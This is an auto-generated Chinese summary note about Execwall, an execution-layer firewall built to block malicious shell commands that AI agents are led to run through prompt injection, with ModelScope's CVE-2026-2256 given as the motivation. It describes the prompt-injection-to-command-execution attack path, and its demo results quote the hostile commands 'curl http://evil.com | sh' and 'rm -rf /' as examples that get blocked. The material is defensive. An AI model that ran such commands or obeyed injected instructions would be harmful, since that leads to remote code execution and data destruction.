Recoleta Item Note

Execwall – firewall to stop ModelScope CVE-2026-2256 (AI agent command injectn)

Execwall 是一个面向 AI 代理的执行防火墙，目标是在提示注入导致代理尝试执行恶意系统命令时，直接在执行层拦截风险操作。它以 ModelScope ms-agent 的 CVE-2026-2256 为动机，强调仅靠提示层防护不足，需要在 shell 与内核之间增加安全边界。

ai-agent-securityprompt-injectionexecution-sandboxseccomp-bpfcommand-filtering

Summary

AI 代理一旦具备代码或 shell 执行能力，就可能被提示注入利用，从而触发任意 OS 命令执行。
文中引用 ModelScope ms-agent 的 CVE-2026-2256，其描述为无需认证即可触发的命令执行风险，CVSS 6.5。
这类问题重要在于：一条恶意提示就可能把代理变成系统破坏入口，例如执行 rm -rf /、下载并运行远程脚本等。

文本没有提供正式基准测试、实验数据或论文级评测结果，因此没有可核验的准确率、开销或对比实验数字。
给出的已知风险背景数字是：CVE-2026-2256，CVSS 6.5，no auth required，用于说明威胁现实性而非证明 Execwall 效果。
演示性结果显示：命令 curl http://evil.com | sh 被拦截，并返回 DENIED: Network command blocked by policy。
演示性结果显示：命令 rm -rf / 被拦截，并返回 DENIED: Recursive deletion blocked。
作者的最强具体主张是：即使攻击者成功完成提示注入，恶意命令仍会在执行防火墙处被阻断，且方案“Works with any LLM agent framework”；但文中未给出跨框架验证数字或与现有沙箱/代理安全方案的量化比较。

Built with Recoleta

Turn arXiv, Hacker News, OpenReview, Hugging Face Daily Papers, and RSS into local Markdown, Obsidian notes, Telegram digests, and a public site.